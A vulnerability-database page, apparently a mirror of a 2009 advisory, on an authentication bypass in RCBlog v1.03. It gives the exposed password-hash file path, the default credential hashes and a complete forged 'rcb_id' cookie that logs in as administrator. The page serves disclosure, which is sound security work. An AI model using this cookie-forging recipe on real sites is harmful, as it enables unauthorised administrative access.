Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

RCBlog v1.03 Authentication Bypass Vulnerability

🗓️ 19 Jan 2009 00:00:00Reported by Danny MoulesType 
zdt
 zdt🔗 0day.today👁 17 Views

RCBlog v1.03 Authentication Bypass Vulnerability, Public Access to Password Hashe

Code
================================================
RCBlog v1.03 Authentication Bypass Vulnerability
================================================


Vendor: http://noahmedling.com
Version(s): RCBlog 1.03 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at https://www.push55.co.uk/index.php?s=ad&id=4

----

By default, the application provides public access to the text file which stores the MD5 hashes of the username/password and these can be found at:

http://www.example.com/rcblog/config/password.txt

These two hashes represent the username (first) and the password (second).

By default these are 9d0aea34e0f22cff881feb82c79ce76a and e20eeabd7d13800e1c30043b269fbc86 respectively.

We need two more hashes to fake the required credentials:

One is the MD5 hash of $_SERVER['PHP_SELF'] which is in this case "/rcblog" -> ad624ca84b593d66e3685e83e4a3618e

The other is the the MD5 hash of the public IP of the user, let's say "192.168.1.5" -> 2e9e9f7c017ee2a1645a236d182fb28c

Finally we combine the hashes into one large string and craft it in a "rcb_id" cookie in the following order:

Directory -> IP Address -> Username -> Password

Resulting in:

9d0aea34e0f22cff881feb82c79ce76ae20eeabd7d13800e1c30043b269fbc86ad624ca84b593d66e3685e83e4a3618e2e9e9f7c017ee2a1645a236d182fb28c

We are then logged in with administrative privileges.



#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
rcblogauthentication bypassvulnerabilitypublic accesspassword hashessecurity advisory
17